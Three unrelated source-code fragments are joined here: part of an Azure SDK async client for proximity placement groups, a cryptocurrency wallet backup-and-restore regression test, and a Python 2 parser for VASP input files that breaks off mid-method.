raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace_async
async def delete(
self,
resource_group_name: str,
proximity_placement_group_name: str,
**kwargs: Any
) -> None:
"""Delete a proximity placement group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
template_url=self.delete.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
proximity_placement_group_name: str,
include_colocation_status: Optional[str] = None,
**kwargs: Any
) -> "_models.ProximityPlacementGroup":
"""Retrieves information about a proximity placement group .
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param proximity_placement_group_name: The name of the proximity placement group.
:type proximity_placement_group_name: str
:param include_colocation_status: includeColocationStatus=true enables fetching the colocation
status of all the resources in the proximity placement group.
:type include_colocation_status: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProximityPlacementGroup, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroup
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroup"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
proximity_placement_group_name=proximity_placement_group_name,
subscription_id=self._config.subscription_id,
include_colocation_status=include_colocation_status,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'} # type: ignore
@distributed_trace
def list_by_subscription(
self,
**kwargs: Any
) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
"""Lists all proximity placement groups in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=self.list_by_subscription.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/proximityPlacementGroups'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
"""Lists all proximity placement groups in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_06_01.models.ProximityPlacementGroupListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProximityPlacementGroupListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
resource_group_name=resource_group_name,
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups'} # type: ignore
| |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Stardust Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Exercise the wallet backup code. Ported from walletbackup.sh.
Test case is:
4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from test_framework.test_framework import StardustTestFramework
from test_framework.util import *
from random import randint
import logging
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO, stream=sys.stdout)
class WalletBackupTest(StardustTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
# This mirrors how the network was setup in the bash test
def setup_network(self, split=False):
# nodes 1, 2,3 are spenders, let's give them a keypool=100
extra_args = [["-keypool=100"], ["-keypool=100"], ["-keypool=100"], []]
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, extra_args)
connect_nodes(self.nodes[0], 3)
connect_nodes(self.nodes[1], 3)
connect_nodes(self.nodes[2], 3)
connect_nodes(self.nodes[2], 0)
self.is_network_split=False
self.sync_all()
def one_send(self, from_node, to_address):
if (randint(1,2) == 1):
amount = Decimal(randint(1,10)) / Decimal(10)
self.nodes[from_node].sendtoaddress(to_address, amount)
def do_one_round(self):
a0 = self.nodes[0].getnewaddress()
a1 = self.nodes[1].getnewaddress()
a2 = self.nodes[2].getnewaddress()
self.one_send(0, a1)
self.one_send(0, a2)
self.one_send(1, a0)
self.one_send(1, a2)
self.one_send(2, a0)
self.one_send(2, a1)
# Have the miner (node3) mine a block.
# Must sync mempools before mining.
sync_mempools(self.nodes)
self.nodes[3].generate(1)
# As above, this mirrors the original bash test.
def start_three(self):
self.nodes[0] = start_node(0, self.options.tmpdir)
self.nodes[1] = start_node(1, self.options.tmpdir)
self.nodes[2] = start_node(2, self.options.tmpdir)
connect_nodes(self.nodes[0], 3)
connect_nodes(self.nodes[1], 3)
connect_nodes(self.nodes[2], 3)
connect_nodes(self.nodes[2], 0)
def stop_three(self):
stop_node(self.nodes[0], 0)
stop_node(self.nodes[1], 1)
stop_node(self.nodes[2], 2)
def erase_three(self):
os.remove(self.options.tmpdir + "/node0/regtest/wallet.dat")
os.remove(self.options.tmpdir + "/node1/regtest/wallet.dat")
os.remove(self.options.tmpdir + "/node2/regtest/wallet.dat")
def run_test(self):
logging.info("Generating initial blockchain")
self.nodes[0].generate(1)
sync_blocks(self.nodes)
self.nodes[1].generate(1)
sync_blocks(self.nodes)
self.nodes[2].generate(1)
sync_blocks(self.nodes)
self.nodes[3].generate(100)
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 50)
assert_equal(self.nodes[3].getbalance(), 0)
logging.info("Creating transactions")
# Five rounds of sending each other transactions.
for i in range(5):
self.do_one_round()
logging.info("Backing up")
tmpdir = self.options.tmpdir
self.nodes[0].backupwallet(tmpdir + "/node0/wallet.bak")
self.nodes[0].dumpwallet(tmpdir + "/node0/wallet.dump")
self.nodes[1].backupwallet(tmpdir + "/node1/wallet.bak")
self.nodes[1].dumpwallet(tmpdir + "/node1/wallet.dump")
self.nodes[2].backupwallet(tmpdir + "/node2/wallet.bak")
self.nodes[2].dumpwallet(tmpdir + "/node2/wallet.dump")
logging.info("More transactions")
for i in range(5):
self.do_one_round()
# Generate 101 more blocks, so any fees paid mature
self.nodes[3].generate(101)
self.sync_all()
balance0 = self.nodes[0].getbalance()
balance1 = self.nodes[1].getbalance()
balance2 = self.nodes[2].getbalance()
balance3 = self.nodes[3].getbalance()
total = balance0 + balance1 + balance2 + balance3
# At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.)
# 114 are mature, so the sum of all wallets should be 114 * 50 = 5700.
assert_equal(total, 5700)
##
# Test restoring spender wallets from backups
##
logging.info("Restoring using wallet.dat")
self.stop_three()
self.erase_three()
# Start node2 with no chain
shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")
# Restore wallets from backup
shutil.copyfile(tmpdir + "/node0/wallet.bak", tmpdir + "/node0/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/node1/wallet.bak", tmpdir + "/node1/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/node2/wallet.bak", tmpdir + "/node2/regtest/wallet.dat")
logging.info("Re-starting nodes")
self.start_three()
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
logging.info("Restoring using dumped wallet")
self.stop_three()
self.erase_three()
#start node2 with no chain
shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")
self.start_three()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
self.nodes[0].importwallet(tmpdir + "/node0/wallet.dump")
self.nodes[1].importwallet(tmpdir + "/node1/wallet.dump")
self.nodes[2].importwallet(tmpdir + "/node2/wallet.dump")
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
if __name__ == '__main__':
WalletBackupTest().main()
| |
import os
from numpy import array,abs,empty,ndarray
from generic import obj
from simulation import SimulationInput
from developer import DevBase
from debug import *
lcs = ls
# support functions for keyword files
def remove_comment(sval):
if ' ' in sval:
sval = sval.split(' ',1)[0]
#end if
return sval
#end def remove_comment
def expand_array(sval):
sarr = []
for v in sval.split():
if '*' in v:
n,vv = v.rsplit('*',1)
sarr.extend(int(n)*[vv])
else:
sarr.append(v)
#end if
#end for
return sarr
#end def expand_array
def read_int(sval):
sval = remove_comment(sval)
return int(sval)
#end def read_int
def read_real(sval):
sval = remove_comment(sval)
return float(sval.replace('d','e'))
#end def read_real
bool_dict = dict(true=True,false=False)
def read_bool(sval):
sval = remove_comment(sval)
return bool_dict[sval.lower().strip('.')]
#end def read_bool
def read_string(sval):
return sval
#end def read_string
def read_int_array(sval):
return array(expand_array(sval),dtype=int)
#end def read_int_array
def read_real_array(sval):
return array(expand_array(sval),dtype=float)
#end def read_real_array
bool_array_dict = dict(T=True,F=False)
def read_bool_array(sval):
barr = []
for v in expand_array(sval):
barr.append(bool_array_dict[v])
#end for
return array(barr,dtype=bool)
#end def read_bool_array
def write_int(v):
return str(v)
#end def write_int
def write_real(v):
return str(v)
#end def write_real
def write_bool(v):
if v:
return '.TRUE.'
else:
return '.FALSE.'
#end if
#end def write_bool
def write_string(v):
return v
#end def write_string
def equality(a,b):
return a==b
#end def equality
def real_equality(a,b):
return abs(a-b)<=1e-6*(abs(a)+abs(b))/2
#end def real_equality
def render_bool(v):
if v:
return 'T'
else:
return 'F'
#end if
#end def render_bool
def write_array(arr,same=equality,render=str,max_repeat=3):
value_counts = []
count = 0
value = arr[0]
for v in arr:
if same(v,value):
count += 1
else:
value_counts.append((value,count))
value = v
count = 1
#end if
#end for
if same(v,value):
value_counts.append((value,count))
else:
value_counts.append((v,1))
#end if
s = ''
for value,count in value_counts:
if count>max_repeat:
s += '{0}*{1} '.format(count,render(value))
else:
for i in xrange(count):
s += render(value)+' '
#end for
#end if
#end for
return s
#end def write_array
def write_int_array(a):
return write_array(a)
#end def write_int_array
def write_real_array(a):
return write_array(a,same=real_equality)
#end def write_real_array
def write_bool_array(a):
return write_array(a,render=render_bool)
#end def write_bool_array
assign_bool_map = {True:True,False:False,1:True,0:False}
def assign_bool(v):
return assign_bool_map[v]
#end def assign_bool
def assign_string(v):
if isinstance(v,str):
return v
else:
raise ValueError('value must be a string')
#end if
#end def assign_string
def assign_int_array(a):
if isinstance(a,(tuple,list,ndarray)):
return array(a,dtype=int)
else:
raise ValueError('value must be a tuple, list, or array')
#end if
#end def assign_int_array
def assign_real_array(a):
if isinstance(a,(tuple,list,ndarray)):
return array(a,dtype=float)
else:
raise ValueError('value must be a tuple, list, or array')
#end if
#end def assign_real_array
def assign_bool_array(a):
if isinstance(a,(tuple,list,ndarray)):
return array(a,dtype=bool)
else:
raise ValueError('value must be a tuple, list, or array')
#end if
#end def assign_bool_array
read_value_functions = obj(
ints = read_int,
reals = read_real,
bools = read_bool,
strings = read_string,
int_arrays = read_int_array,
real_arrays = read_real_array,
bool_arrays = read_bool_array
)
write_value_functions = obj(
ints = write_int,
reals = write_real,
bools = write_bool,
strings = write_string,
int_arrays = write_int_array,
real_arrays = write_real_array,
bool_arrays = write_bool_array
)
assign_value_functions = obj(
ints = int,
reals = float,
bools = assign_bool,
strings = assign_string,
int_arrays = assign_int_array,
real_arrays = assign_real_array,
bool_arrays = assign_bool_array
)
class VFile(DevBase):
def __init__(self,filepath=None):
if filepath!=None:
self.read(filepath)
#end if
#end def __init__
def read(self,filepath):
if not os.path.exists(filepath):
self.error('file {0} does not exist'.format(filepath))
#end if
text = open(filepath,'r').read()
self.read_text(text,filepath)
return text
#end def read
def write(self,filepath=None):
text = self.write_text(filepath)
if filepath!=None:
open(filepath,'w').write(text)
#end if
return text
#end def write
def read_text(self,text,filepath=''):
self.not_implemented()
#end def read_text
def write_text(self,filepath=''):
self.not_implemented()
#end def write_text
def remove_comment(self,line):
cloc1 = line.find('!')
cloc2 = line.find('#')
has1 = cloc1!=-1
has2 = cloc2!=-1
if has1 or has2:
if has1 and has2:
cloc = min(cloc1,cloc2)
elif has1:
cloc = cloc1
else:
cloc = cloc2
#end if
line = line[:cloc].strip()
#end if
return line
#end def remove_comment
#end class VFile
class VKeywordFile(VFile):
kw_scalars = ['ints','reals','bools','strings']
kw_arrays = ['int_arrays','real_arrays','bool_arrays']
kw_fields = kw_scalars + kw_arrays + ['keywords','unsupported']
@classmethod
def class_init(cls):
for kw_field in cls.kw_fields:
if not kw_field in cls.__dict__:
cls.__dict__[kw_field] = set()
#end if
#end for
#cls.check_consistency()
cls.scalar_keywords = set()
for scalar_field in cls.kw_scalars:
cls.scalar_keywords |= cls.__dict__[scalar_field]
#end for
cls.array_keywords = set()
for array_field in cls.kw_arrays:
cls.array_keywords |= cls.__dict__[array_field]
#end for
cls.keywords = cls.scalar_keywords | cls.array_keywords
cls.type = obj()
cls.read_value = obj()
cls.write_value = obj()
cls.assign_value = obj()
for type in cls.kw_scalars + cls.kw_arrays:
for name in cls.__dict__[type]:
cls.type[name] = type
cls.read_value[name] = read_value_functions[type]
cls.write_value[name] = write_value_functions[type]
cls.assign_value[name] = assign_value_functions[type]
#end for
#end for
#end def class_init
@classmethod
def check_consistency(cls):
fail = False
msg = ''
types = cls.kw_scalars+cls.kw_arrays
untyped = cls.keywords
for type in types:
untyped -= cls.__dict__[type]
#end for
if len(untyped)>0:
fail = True
msg += 'variables without a type: {0}\n'.format(sorted(untyped))
#end if
for type in types:
unknown = cls.__dict__[type]-cls.keywords
if len(unknown)>0:
fail = True
msg += 'unknown {0}: {1}\n'.format(type,sorted(unknown))
#end if
#end for
if fail:
cls.class_error(msg)
#end if
#end def check_consistency
def read_text(self,text,filepath=''):
lines = text.splitlines()
expression = None
continued = False
for line in lines:
ls = line.strip()
if len(ls)>0 and ls[0]!='!' and ls[0]!='#':
ls = self.remove_comment(ls)
this_cont = ls.endswith('\\')
if this_cont:
ls = ls.rstrip('\\')
if continued:
expression += ls
else:
expression = ls
continued = True
#end if
elif continued:
expression += ls
continued = False
else:
expression = ls
#end if
if not continued:
tokens = expression.split(';')
for token in tokens:
if '=' in token:
name,value = token.split('=',1)
name = name.lower().strip()
value = value.strip()
if name in self.keywords:
try:
value = self.read_value[name](value)
self[name] = value
except Exception,e:
self.error('read failed for keyword {0}\nkeyword type: {1}\ninput text: {2}\nexception:\n{3}'.format(name,self.type[name],token,e))
#end try
elif name in self.unsupported:
self.warn('keyword {0} is not currently supported'.format(name))
else:
#ci(lcs(),gs())
self.error('{0} is not a keyword for the {1} file'.format(name.upper(),self.__class__.__name__.upper()))
#end if
#end if
#end for
#end if
#end if
#end for
#end def read_text
def write_text(self,filepath=''):
text = ''
maxlen=0
for name in self.keys():
maxlen = max(maxlen,len(name))
#end for
#maxlen = min(maxlen,9)
valfmt = '{0:<'+str(maxlen)+'} = {1}\n'
for name in sorted(self.keys()):
value = self[name]
try:
svalue = self.write_value[name](value)
except Exception,e:
self.error('write failed for file {0} keyword {1}\nkeyword type: {2}\nvalue: {3}\nexception:\n{4}'.format(filepath,name,self.type[name],value,e))
#end try
text += valfmt.format(name.upper(),svalue)
#end for
return text
#end def write_text
def assign(self,**values):
for name,value in values.iteritems():
try:
self[name] = self.assign_value[name](value)
except Exception,e:
self.error('assign failed for keyword {0}\nkeyword type: {1}\nvalue: {2}\nexception:\n{3}'.format(name,self.type[name],value,e))
#end try
#end for
#end def assign
#end class VKeywordFile
class VFormattedFile(VFile):
def read_lines(self,text,remove_empty=False):
raw_lines = text.splitlines()
lines = []
for line in raw_lines:
ls = self.remove_comment(line).strip()
if not remove_empty or len(ls)>0:
lines.append(ls)
#end if
#end for
return lines
#end def read_lines
def join(self,lines,first_line,last_line):
joined = ''
for iline in xrange(first_line,last_line):
joined += lines[iline]+' '
#end for
joined += lines[last_line]
return joined
#end def join
def is_empty(self,lines,start=None,end=None):
if start is None:
start = 0
#end if
if end is None:
end = len(lines)
#end if
is_empty = True
for line in lines[start:end]:
is_empty &= len(line)==0
#end for
return is_empty
#end def is_empty
#end class VFormattedFile
class Incar(VKeywordFile):
keywords = set('''
addgrid aexx aggac aggax aldac algo amin amix amix_mag andersen_prob apaco
bmix bmix_mag
clnt cln cll clz cmbj cshift
deper dimer_dist dipol dq
ebreak eint ediff ediffg efield efield_pead elmin emax emin enaug encut
encutfock encutgw encutgwsoft enmax enmin epsilon evenonly evenonlygw
ferdo ferwe findiff
gga gga_compat
hfscreen hflmaxf hills_bin hills_h hills_w
ialgo iband ibrion icharg ichibare i_constrained_m icorelevel idipol
igpar images imix increm inimix iniwav ipead isif ismear ispin istart
isym ivdw iwavpr
kblock kgamma kpar kpuse kspacing
lambda langevin_gamma langevin_gamma_l lasph lasync lattice_constraints
lberry lblueout lcalceps lcalcpol lcharg lchimag lcorr ldau ldauj ldaul
ldauprint ldautype ldauu ldiag ldipol lefg lelf lepsilon lhfcalc lhyperfine
lkproj lmaxfock lmaxfockae lmaxfockmp2 lmaxmix lmaxmp2 lmaxpaw lmaxtau
lmixtau lmono lnabla lnmr_sym_red lnoncollinear loptics lorbit lpard
lpead lplane lreal lrpa lscalapack lscaler0 lscalu lscsgrad lselfenergy
lsepb lsepk lspectral lsorbit lthomas luse_vdw lvdw lvdw_ewald lvdwscs
lvhar lvtot lwave
magmom maxmem maxmix mbja mbjb m_constr mdalgo metagga minrot mixpre
nbands nbandsgw nblk nblock nbmod ncore nedos nelect nelm nelmdl nelmin
nfree ngx ngxf ngy ngyf ngz ngzf nkred nkredx nkredy nkredz nlspline
nmaxfockae nomega nomegar npaco npar nppstr nsim nsw nsubsys nupdown
nwrite
oddonly oddonlygw ofield_a ofield_kappa ofield_q6_far ofield_q6_near
omegamax omegamin omegatl
param1 param2 pmass pomass potim prec precfock pstress psubsys
random_seed ropt rwigs
saxis scsrad shakemaxiter shaketol sigma skip_edotp smass spring step_max
step_size symprec system
tebeg teend time tsubsys
value_max value_min vdw_a1 vdw_a2 vdw_alpha vdw_cnradius vdw_c6 vdw_c6au
vdw_d vdw_radius vdw_r0 vdw_r0au vdw_scaling vdw_sr vdw_s6 vdw_s8 voskown
wc weimin
zab_vdw zval
'''.split()) # only used to check consistency of typed names below
# some of these are mixed type arrays or other oddly formatted fields
unsupported = set('quad_efg'.split())
ints = set('''
apaco
clnt cln cll clz
elmin
findiff
hflmaxf hills_bin
ialgo ibrion icharg ichibare i_constrained_m icorelevel idipol igpar
images imix inimix iniwav ipead isif ismear ispin istart isym ivdw iwavpr
kblock kpar
ldauprint ldautype lmaxfock lmaxfockae lmaxfockmp2 lmaxmix lmaxmp2
lmaxpaw lorbit
maxmem maxmix mdalgo mixpre
nbands nbandsgw nblk nblock nbmod ncore nedos nelm nelmdl nelmin nfree
ngx ngxf ngy ngyf ngz ngzf nkred nkredx nkredy nkredz nmaxfockae nomega
nomegar npaco npar nppstr nsim nsw nupdown nwrite
shakemaxiter smass spring
voskown
'''.split())
reals = set('''
aexx aggac aggax aldac amin amix amix_mag andersen_prob
bmix bmix_mag
cshift
deper dimer_dist dq
ebreak ediff ediffg efield emax emin enaug encut encutfock encutgw
encutgwsoft enmax enmin epsilon
hfscreen hills_h hills_w
kspacing
lambda langevin_gamma_l
mbja mbjb minrot
nelect
ofield_a ofield_kappa ofield_q6_far ofield_q6_near omegamax omegamin omegatl
param1 param2 pmass pomass potim pstress
scsrad shaketol sigma step_max step_size symprec
tebeg teend time
vdw_a1 vdw_a2 vdw_cnradius vdw_d vdw_radius vdw_scaling vdw_sr vdw_s6 vdw_s8
wc weimin
zab_vdw zval
'''.split())
bools = set('''
addgrid
evenonly evenonlygw
gga_compat
lasph lasync lberry lblueout lcalceps lcalcpol lcharg lchimag lcorr
ldau ldiag ldipol lefg lelf lepsilon lhfcalc lhyperfine lkproj lmaxtau
lmixtau lmono lnabla lnmr_sym_red lnoncollinear loptics lpard lpead
lplane lrpa lscalapack lscaler0 lscalu lscsgrad lselfenergy lsepb
lsepk lsorbit lspectral lthomas luse_vdw lvdw lvdw_ewald lvdwscs lvhar
lvtot lwave
kgamma
nlspline
oddonly oddonlygw
skip_edotp
'''.split())
strings = set('''
algo
gga
lreal
metagga
prec precfock
system
'''.split())
int_arrays = set('''
iband
kpuse
ldaul
nsubsys
random_seed
'''.split())
real_arrays = set('''
cmbj
dipol
efield_pead eint
ferdo ferwe
increm
langevin_gamma ldauj ldauu
magmom m_constr
psubsys
ropt rwigs
saxis
tsubsys
value_max value_min vdw_alpha vdw_c6 vdw_c6au vdw_r0 vdw_r0au
'''.split())
bool_arrays = set('''
lattice_constraints
'''.split()) # formatted: F F T, etc
#end class Incar
class Stopcar(VKeywordFile):
keywords = set('lstop labort'.split())
bools = set('lstop labort'.split())
#end class Stopcar
for cls in Incar,Stopcar:
cls.class_init()
#end for
del VKeywordFile.kw_scalars
del VKeywordFile.kw_arrays
del VKeywordFile.kw_fields
class Iconst(VFormattedFile): # metadynamics -> 6.62.4
None
#end class Iconst
class Kpoints(VFormattedFile):
# mode == explicit
# coord = cartesian/reciprocal
# kpoints = list of 3D kpoints
# kweights = list of kpoint weights
# tetrahedra = optional list of tetra objects (volume, degeneracy, corners)
#
# mode == line
# coord = cartesian/reciprocal
# ninsert = number of points inserted between each set of endpoints
# endpoints = kpoint pairs forming line endpoints
#
# mode == auto
# centering = auto/gamma/monkhorst-pack
# kgrid = number of grid points for each direction (single integer)
# kshift = optional shift of k-point grid
#
# mode == basis
# coord = cartesian/reciprocal
# kbasis = 3x3 matrix of kpoint basis vectors
# kshift = shift of kpoint mesh
centering_options = obj(a='auto',g='gamma',m='monkhorst-pack')
def coord_options(self,cselect):
if cselect=='c' or cselect=='k':
return 'cartesian'
else:
return 'reciprocal'
#end if
#end def coord_options
def __init__(self,filepath=None):
self.mode = None # explicit, line, auto, basis
VFile.__init__(self,filepath)
#end def __init__
def read_text(self,text,filepath=''):
lines = self.read_lines(text,remove_empty=True)
if len(lines)>2:
if not ' ' in lines[1]:
iselect = int(lines[1])
else: # erroneous case? (e.g. user supplies '0 0 0' instead of '0')
iselect = int(lines[1].split()[0])
#end if
cselect = lines[2].lower()[0]
if iselect==0: # auto or basis
if cselect=='a': # fully auto mesh
self.mode = 'auto'
self.centering = self.centering_options[cselect]
self.kgrid = int(lines[3])
elif cselect=='g' or cselect=='m': # gamma or monkhorst mesh
self.mode = 'auto'
self.centering = self.centering_options[cselect]
self.kgrid = array(lines[3].split(),dtype=int)
if len(lines)>4:
self.kshift = array(lines[4].split(),dtype=float)
else:
self.kshift = None
#end if
else:
self.mode = 'basis' # basis generated mesh
self.coord = self.coord_options(cselect)
self.kbasis = array(self.join(lines,3,5).split(),dtype=float)
self.kbasis.shape = 3,3
self.kshift = array(lines[6].split(),dtype=float)
#end if
elif cselect=='l': # line mode (band structure)
self.mode = 'line'
self.ninsert = iselect
self.coord = self.coord_options(lines[3].lower()[0])
endpoints = []
for line in lines[4:]:
endpoints.append(line.split())
#end for
self.endpoints = array(endpoints,dtype=float)
else: # explicit kpoints
self.mode = 'explicit'
self.coord = self.coord_options(cselect)
nkpoints = iselect
kpw = []
for line in lines[3:3+nkpoints]:
kpw.append(line.split())
#end for
kpw = array(kpw,dtype=float)
self.kpoints = kpw[:,0:3]
self.kweights = kpw[:,3].ravel()
tetline = 3+nkpoints
if len(lines)>tetline and lines[tetline].lower()[0]=='t':
self.tetrahedra = obj()
tokens = lines[tetline+1].split()
ntets = int(tokens[0])
tet_volume = float(tokens[1])
for n in xrange(ntets):
tokens = lines[tetline+2+n].split()
self.tetrahedra.append(
obj(volume = tet_volume,
degeneracy = int(tokens[0]),
corners = array(tokens[1:],dtype=int))
)
#end for
#end if
#end if
#end if
#end def read_text
def write_text(self,filepath=''):
text = ''
if self.mode=='auto':
text+='{0} mesh\n 0\n'.format(self.centering)
if self.centering=='auto':
text+='auto\n'
text+=' {0:d}\n'.format(self.kgrid)
elif self.centering=='gamma' or self.centering=='monkhorst-pack':
text+='{0}\n'.format(self.centering)
text+=' {0:d} {1:d} {2:d}\n'.format(*self.kgrid)
if self.kshift!=None:
text+=' {0} {1} {2}\n'.format(*self.kshift)
#end if
else:
self.error('invalid centering for file {0}: {1}\nvalid options are: auto, gamma, monkhorst-pack'.format(filepath,self.centering))
#end if
elif self.mode=='basis':
text+='basis mesh\n 0\n'
text+='{0}\n'.format(self.coord)
for kb in self.kbasis:
text+=' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*kb)
#end for
text+=' {0:18.14f} {1:18.14f} {2:18.14f}\n'.format(*self.kshift)
elif self.mode=='line':
text+='kpoints along lines\n {0}\nline-mode\n'.format(self.ninsert)
text+='{0}\n'.format(self.coord)
